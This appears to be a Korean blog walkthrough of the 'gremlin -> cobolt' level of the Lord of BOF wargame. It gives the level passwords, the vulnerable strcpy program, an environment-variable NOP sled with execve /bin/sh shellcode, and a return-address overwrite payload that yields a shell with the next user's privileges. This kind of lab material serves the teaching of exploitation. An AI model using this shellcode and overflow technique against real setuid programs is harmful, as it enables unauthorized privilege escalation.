[2] gremlin -> cobolt ( Small BOF )

2017. 11. 17. 13:17SystemHacking/LOB(BOF원정대)



gremlin / hello bof world

문제 풀이 전 필수입력 !!

[gremlin@localhost gremlin]$ /bin/bash2

[gremlin@localhost gremlin]$ export SHELL=/bin/bash2



[ cobolt.c ]

1
2
3
4
5
6
7
8
9
10
11
int main(int argc, char *argv[])
{
    char buffer[16];
    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }
    strcpy(buffer, argv[1]);
    printf("%s\n", buffer);
}
 
cs


[ Stack 구조 ]

buffer        16byte

saved ebp    4byte

saved eip    RET


< 문제풀이 >


1> 환경변수에 쉘 코드를 올린다

$ export tmp=$(python -c 'print "\x90" * 1000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"')

$ env 로 확인 !


2> payload 작성

[gremlin@localhost gremlin]$ ./cobolt $(python -c 'print "A" * 20 + "\xaa\xfa\xff\xbf"')

AAAAAAAAAAAAAAAAAAAA▒▒▒▒

bash$ id

uid=501(gremlin) gid=501(gremlin) euid=502(cobolt) egid=502(cobolt) groups=501(gremlin)

bash$ my-pass

euid = 502

hacking exposed

bash$